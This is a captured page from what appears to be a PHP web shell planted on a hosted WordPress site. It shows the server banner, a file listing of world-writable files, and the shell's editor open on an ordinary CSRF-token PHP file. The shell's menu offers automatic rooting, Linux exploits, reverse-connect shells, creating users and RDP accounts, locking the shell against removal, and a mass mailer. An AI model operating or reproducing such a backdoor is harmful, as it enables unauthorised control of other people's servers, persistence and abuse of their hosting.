Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
content /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
fonts
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
body.txt
62.29
KB
-rwxrwxrwx
content.php
19.45
KB
-rwxrwxrwx
csrf_functions.php
1.4
KB
-rwxrwxrwx
index.html
186
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : csrf_functions.php
<?php define('CSRF_SECRET', 'your-very-secret-key-here-change-this'); function base64url_encode($data) { return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); } function base64url_decode($data) { return base64_decode(strtr($data, '-_', '+/')); } function generateCsrfToken($ip, $userAgent) { $timestamp = time(); $data = $ip . '|' . $userAgent . '|' . $timestamp; $hash = hash_hmac('sha256', $data, CSRF_SECRET); // URL-safe base64 return base64url_encode($timestamp . '|' . $ip . '|' . base64url_encode($userAgent) . '|' . $hash); } function validateCsrfToken($token, $currentIp, $currentUserAgent) { $decoded = base64url_decode($token); if (!$decoded) return false; $parts = explode('|', $decoded); if (count($parts) !== 4) return false; list($timestamp, $tokenIp, $encodedUserAgent, $hash) = $parts; $tokenUserAgent = base64url_decode($encodedUserAgent); // Check expiration (30 minutes) if ((time() - $timestamp) > 1800) return false; // IP match if ($tokenIp !== $currentIp) return false; // User-Agent match if ($tokenUserAgent !== $currentUserAgent) return false; // Hash verification $data = $tokenIp . '|' . $tokenUserAgent . '|' . $timestamp; $expectedHash = hash_hmac('sha256', $data, CSRF_SECRET); return hash_equals($expectedHash, $hash); } function getClientIP() { return $_SERVER['REMOTE_ADDR'] ; } ?>
Close